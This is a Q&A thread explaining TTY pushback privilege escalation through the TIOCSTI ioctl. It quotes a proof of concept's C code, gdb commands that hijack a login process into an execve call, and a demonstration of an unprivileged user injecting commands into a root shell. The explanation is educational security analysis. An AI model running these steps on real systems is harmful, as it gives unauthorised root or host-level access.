# tty push back - priv escalation

Tags: linux, privilege-escalation

I am trying to understand TTY push back better (assuming I am even using the correct terminology).

from what I can determine through researching is that tty push back can allow a user to essentially as it says "push back" against a root command and thus gain root privileges: [Link describing what i know so far](http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/)

In the scenario the root user is running an application as another to maybe try and avoid a direct root shell if compromised e.g. `su -l www-data -c randomapplication`

Reading through the link above it suggests a few things, of which i do not understand (below). what exactly is gdb being used for and are there alternatives for this particular exploit?

The general point of this post is to get a deeper explanation of tty push back and how exactly it works and how to exploit it.

```
cat <<EOF > /x
#!/bin/bash
exec /TtyPushbackSignalin --NoSignal -- \$'\ntouch /xxx-outside\nstty sane'
EOF
chmod 0755 /x
gdb --pid [pid of login process]
(gdb) set *0x8051000=0x7880cd
(gdb) set *0x8051004=0x8051002
(gdb) set *0x8051008=0
(gdb) set $eax=0x0b
(gdb) set $ebx=0x8051002
(gdb) set $ecx=0x8051004
(gdb) set $edx=0x8051008
(gdb) set $eip=0x8051000
(gdb) quit
```

[C Code POC](http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/TtyPushbackSignaling.c)

Comment: Can you give more information about the linux box that you are running your code ? Kernel version, distro, etc... ? Full disclosure date is a bit old, 2012/11/10, so you can expect that it won't be vulnerable

Comment: @Rafael I have forgotten the kernel number, though can we assume its vulnerable? I must have looked the kernel version up to figure out if it was or not so for me to pursue the version numbers must have matched up

Comment: Hmm... the GDB there forces the login process to perform a syscall.  It sets the instruction pointer of the running (but sleeping) process to execute 0x7880cd.  And 0x80cd is `int 0x80` in intel assembly, which is a syscall to 0x78 (120).  Checking my latest `syscalls_32.h`, 120 is `sys_clone`, which is how new processes are created.  That more-or-less makes sense, when the login process executes again (on logoff) it will execute that syscall instead.  But now I need to go to sleep, it is 4AM for me.

Answer (score 8, accepted):

OK, this is not a complete answer therefore I preferred to wait for the bounty to expire to not seem opportunistic.  I cannot replicate the `linux-vserver` part of the vulnerability (mostly because it probably needs a 2.6 kernel and the assembly above will require that both the host and the guest machines are in 32bit mode).  I can only replicate the basic vulnerability, and explain how the rest works.  Here goes:

---

### The pushback

The `TIOCSTI` ioctl is an esoteric IO control which allows to fake input, from `man 4 tty_ioctl`

```
Faking input
    TIOCSTI   const char *argp
           Insert the given byte in the input queue.
```

Therefore you can place bytes into the input queue of a TTY (or more likely on modern systems PTY, i.e. pseudo terminal) programmatically.

Now, if a TTY is shared by a process that has limited privileges and a process that has elevated privileges (e.g. root shell), you may be able to empty the queue into the elevated privilege shell from the limited shell.  This is performed by the [example code sample from halfdog](http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/TtyPushbackSignaling.c), but there is one extra thing we need to know about: how shells deal with the `SIGSTOP` signal.  So we will make a detour there.

#### SIGSTOP, SIGTSTP and shells

SIGSTOP is treated in exactly the same way as SIGTSTP ([see the SO question](https://stackoverflow.com/questions/11886812/whats-the-difference-between-sigstop-and-sigtstp)), and SIGTSTP is performed in pretty much all terminals with <kbd>Ctrl</kbd>+<kbd>Z</kbd>.  A trivial example would be:

```
]$ less /etc/group  # And hit Ctrl+Z

[1]+  Stopped(SIGTSTP)        less /etc/group
]$ fg  # fg sends SIGCONT, and we are back inside less
```

Yet, shells ignore SIGTSTP, for example

```
]# su - grochmal
]$  # Ctrl+Z does not do anything in here
]$ exit
logout
]#  # back into a root shell
```

Shells do not ignore SIGSTOP but shells that receive SIGSTOP first relay SIGSTOP to all its children and only then wait, this is also the reason you need to use the `nohup` command when you want a process to survive shell stop (or shell termination).  Hmm... but since `nohup` can make a process survive shell stop so can one of our processes that implements similar signal handlers.

Moreover, if we can leave our process running after the shell stops **and then** inject bytes into the TTY input, who will receive those bytes is the root shell!

#### The code

The example code does exactly that, first it prepares the signal handlers:

```
sigAction.sa_sigaction=handleSignal;
sigfillset(&sigAction.sa_mask);
sigAction.sa_flags=SA_SIGINFO;
sigAction.sa_restorer=NULL;
sigaction(SIGSTOP, &sigAction, NULL);
```

And sends SIGSTOP to its parent (the unprivileged shell):

```
if (sendSignalFlag) kill(getppid(), SIGSTOP);
```

It then pushes every byte from the argument after `--` into the TTY input:

```
pushbackLength=strlen(pushbackString)+1;
for(pushbackPos=0; pushbackPos<pushbackLength; pushbackPos++) {
  result=ioctl(0, TIOCSTI,
      pushbackPos+1!=pushbackLength?pushbackString+pushbackPos:"\n");
  if(result) {
    fprintf(stderr, "Pushback failed, result %d, error %d (%s)\n",
        result, errno, strerror(errno));
    return(1);
  }
}
```

And that's all.  The only extra trick is the `$''` syntax which I'll talk about in the next example:

#### Example of trivial usage

Let's start from a root shell, perform a `su -` and make a trivial pushback.

```
]# ls /
bin  boot  dev  etc  home  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
]# su - grochmal
]$ wget http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/TtyPushbackSignaling.c
]$ gcc -o ttyp TtyPushbackSignaling.c 
TtyPushbackSignaling.c: In function ‘main’:
TtyPushbackSignaling.c:83:28: warning: implicit declaration of function ‘getppid’ [-Wimplicit-function-declaration]
   if (sendSignalFlag) kill(getppid(), SIGSTOP);
```

That's fine, they just forgot to add `#include <unistd.h>`.  And now the pushback:

```
]$ echo yay >/yay
-bash: /yay: Permission denied
]$ ./ttyp -- $'echo yay >/yay\necho nay >/nay\n'
echo yay >/yay
echo nay >/nay


[1]+  Stopped                 su - grochmal
]# echo yay >/yay
]# echo nay >/nay
]#   # here I regain control of the shell
]# jobs
[1]+  Stopped                 su - grochmal
]# ls /
bin  boot  dev  etc  home  lib  lib64  lost+found  media  mnt  nay  opt  proc  root  run  sbin  srv  sys  tmp  usr  var  yay
```

As the user `grochmal` I can't write to `/yay`, but if I push the `echo` into the input queue and force the root shell to execute it, it goes out with root privileges.  The `./ttyp` call uses the `$''` shell syntax which allows me to embed `\n` characters as newlines (0x0a) notas the two characters `\` and `n`.

```
]$ echo 'yay\nyay'
yay\nyay
]$ echo $'yay\nyay'
yay
yay
```

---

### Inside the virtual container

(Can't replicate this, can only argue about how it should work)

Now comes the tricky bit of your question, namely this:

```
cat <<EOF > /x
#!/bin/bash
exec /TtyPushbackSignalin --NoSignal -- \$'\ntouch /xxx-outside\nstty sane'
EOF
chmod 0755 /x
gdb --pid [pid of login process]
(gdb) set *0x8051000=0x7880cd
(gdb) set *0x8051004=0x8051002
(gdb) set *0x8051008=0
(gdb) set $eax=0x0b
(gdb) set $ebx=0x8051002
(gdb) set $ecx=0x8051004
(gdb) set $edx=0x8051008
(gdb) set $eip=0x8051000
(gdb) quit
```

This expects a vitualisation engine (in this case `linux-vserver`) to share a TTY between the host and the guest machines.  In other words we are not escalating privileges from a normal user to root but from root on a virtual machine into root on the host machine.

The first part is not that different from the trivial example above.  We create a script named `/x` and call the pushback code from inside it.  The only differences are:

1. We will call this upon logout (see more below), so we do not need to send SIGSTOP ourselves.  We use `--NoSignal` for that (it controls that flag in the code).
2. We need to escape the `$` (`\$`) since it needs to be passed to `exec`

So yeah we have a script (`/x`) that is executable (`chmod 755`).  If we can force that script to be called upon logoff (and the TTY is shared) we win.  We know that logoff is performed by waking up the `login` process which then returns the TTY.

Note: most of today's Linux systems will be using `systemd-login` not plain `login`.

#### The assembly part

The login process is waiting for SIGCONT (just like any stopped process) and its memory is owned by root of the virtual machine.  Since we own that memory we can make the process execute whatever we want by corrupting it.  That is what GDB is doing there.  Based on the register names in that excerpt we can see that it is running on an i386 Intel CPU, which is little-endian and has a word size of 32bits (4 bytes).  We can rewrite that GDB part to an equivalent that use full words (GDB would use full words anyway, the following is just more explicit):

```
gdb --pid [pid of login process]
(gdb) set *0x8051000=0x007880cd
(gdb) set *0x8051004=0x08051002
(gdb) set *0x8051008=0x00000000
(gdb) set $eax=0x0000000b
(gdb) set $ebx=0x08051002
(gdb) set $ecx=0x08051004
(gdb) set $edx=0x08051008
(gdb) set $eip=0x08051000
(gdb) quit
```

We are overwriting `EIP` the instruction pointer to point to a place in memory which we overwrite with `0x007880cd`.  `cd` is an OPCODE which take one byte as an argument therefore we can read it as an operation `cd80` or simply `int 0x80` in Intel assembly (remember that this is little-endian).

`int 80` happens to be the interrupt that performs a `syscall` on x86 (i386) Intel.  The interrupt number is taken from the `EAX` register, which we have overwritten with `0x0b`.  We can check for that interrupt number in the Linux kernel headers, i.e. in `x86/include/generated/asm/syscalls_32.h`.  It happens to be:

```
#ifdef CONFIG_X86_32
__SYSCALL_I386(11, sys_execve, )
#else
__SYSCALL_I386(11, compat_sys_execve, )
#endif
```

So yeah, once it wake up, the login process will perform the `sys_execve` system call.  But, wait, according to `man 2 execve`, that system call has arguments:

```
int execve(const char *filename, char *const argv[], char *const envp[]);
```

All (well, almost all) syscalls have 3 arguments, they are take from the `EBX`, `ECX` and `EDX` registers, which we also conveniently overwrite:

- `EBX` contains `0x08051002`, which is 2 bytes after `0x08051002`, which we have set to `0x007880cd`.  If we remember that this is a little endian machine we can see that the first two bytes after `0x08051002` are `0x0078`.  This is interpreted as `const char *` therefore it is the character `x` (0x78) and the string terminator `\0` (0x00).
- `ECX` should be a `const char **`, a pointer of pointers (null terminated for syscall purposes).  On x86 Intel a pointer is 4 bytes long.  We set `ECX` to `0x08051004`, and the first 4 bytes contain `0x08051002` which is a pointer to the string `"x"` (remember? that is the content of `EBX`).  The next 4 bytes (at `0x08051004`) contains only zeros terminating the pointer of pointers.
- `EDX` contains `0x08051008` which (as a `const char **`) points to 4 bytes of zeros, meaning a null argument.

Therefore, in plain C, our call could be written as:

```
const char *x = "x";
const char **ar = { x, 0 };
execve(x, ar, ar[1]);
```

This technique of reusing memory locations for several arguments in a syscall is very common in shellcode, this is because it reduces the size of it.

#### Extra notes

The guys at halfdog also mention NX and ASLR but I have no clue why.  NX and ASLR protect from buffer overflows when the attacker either can only overwrite the stack or cannot analyze the specific instance of a process ('cause the stack start is randomized).

- **NX** prevent execution of assembly from the stack.  But we do not care about the stack, we pretty much can corrupt the memory next to the current `EIP` which would be in a part of memory that is allowed to contain executable instructions.
- **ASLR** randomises the start of the stack location in memory.  This prevents a buffer overflow from knowing where it is.  There was a vulnerability here that allowed to overcome it by bouncing of `lib-exec` (mentioned by halfdog), but it has long been fixed pretty much everywhere.

You can defeat both by simply using GDB and `/proc/<PID>/stat` to find the current `EIP`, [see the relevant SO question](https://stackoverflow.com/questions/1357594/get-instruction-pointer-of-running-application-on-unix), and corrupt memory close to it instead of `0x8051000`.

#### Conclusion

The vulnerability performed an `execve` call from the corrupted `login` process.  This `execve` started the script that pushed bytes into the TTY input queue which then was read by the host machine shell.

I could not replicate this on anything I had.  I admit that I did not use an environment similar to what halfdog did (kernel 2.6, x86 Intel, linux-vserver; instead I tried x86_64, kernels 3.16 and 4.7, and Xen).  One thing that bugs me is how the `execve` call finds the script (that's my major issue with replication), I believe that linux-vserver leaves the host shell in the `/` filesystem of the guest machine (see `man 7 path_resolution`).  Nevertheless, I hope that this more or less clarifies how this **should** work.

Comment: sorry for the late response i was out of country, is there anyway we can live chat id love to fire some questions?

Comment: @silverpenguin - heh, and now it is me who was out of my country :).  I'm often found in the [DMZ](http://chat.stackexchange.com/rooms/151/the-dmz).  Just @ me message there and i should pop up in an hour or so.